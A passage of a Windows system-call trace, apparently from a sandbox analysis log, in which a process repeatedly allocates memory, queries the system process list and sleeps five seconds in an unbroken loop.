SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.967] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.975] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.982] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.989] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0222.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0222.996] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0222.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0222.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0222.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0222.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0222.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.003] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.010] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.017] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.023] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.030] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.037] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.044] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.051] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.060] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.067] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.073] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.080] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.087] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.093] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.101] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0223.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0223.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0223.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0223.108] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0223.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0223.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0223.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 